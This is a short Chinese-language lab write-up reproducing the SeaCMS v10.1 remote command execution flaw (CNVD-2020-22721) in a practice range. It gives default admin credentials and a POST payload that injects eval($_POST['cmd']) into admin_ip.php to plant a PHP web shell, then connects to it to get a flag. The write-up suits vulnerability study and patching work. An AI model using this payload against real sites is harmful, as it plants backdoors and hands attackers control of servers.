seacms 远程命令执行 (CNVD-2020-22721)

1、产品简介

海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。

2、漏洞概述

SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。

3、影响范围

v10.1

4、漏洞知识

1、审计

寻找用户可控参数,且存在对用户输入没有或处理不完全情况,直接写入文件,攻击者可利用该漏洞执行恶意代码,获取服务器权限。

2、环境

将php后门代码写入到是php的文件里面,然后再连接该php文件。

5、漏洞复现

1、开启靶场访问IP 后台路径:/manager 后台密码:admin:admin

seacms 远程命令执行 (CNVD-2020-22721)_第1张图片

2、点击系统---->后台ip安全设置 点击确认,并抓包

seacms 远程命令执行 (CNVD-2020-22721)_第2张图片

3、 POST提交的数据中写入后门连接代码 v=0&ip=+11111111111";eval($_POST['cmd']);//

seacms 远程命令执行 (CNVD-2020-22721)_第3张图片

4、访问写入的页面 http://123.58.224.8:44871/manager/admin_ip.php 回显正常

seacms 远程命令执行 (CNVD-2020-22721)_第4张图片

5、后门连接

seacms 远程命令执行 (CNVD-2020-22721)_第5张图片

6、获取flag

seacms 远程命令执行 (CNVD-2020-22721)_第6张图片

你可能感兴趣的:(php,web安全)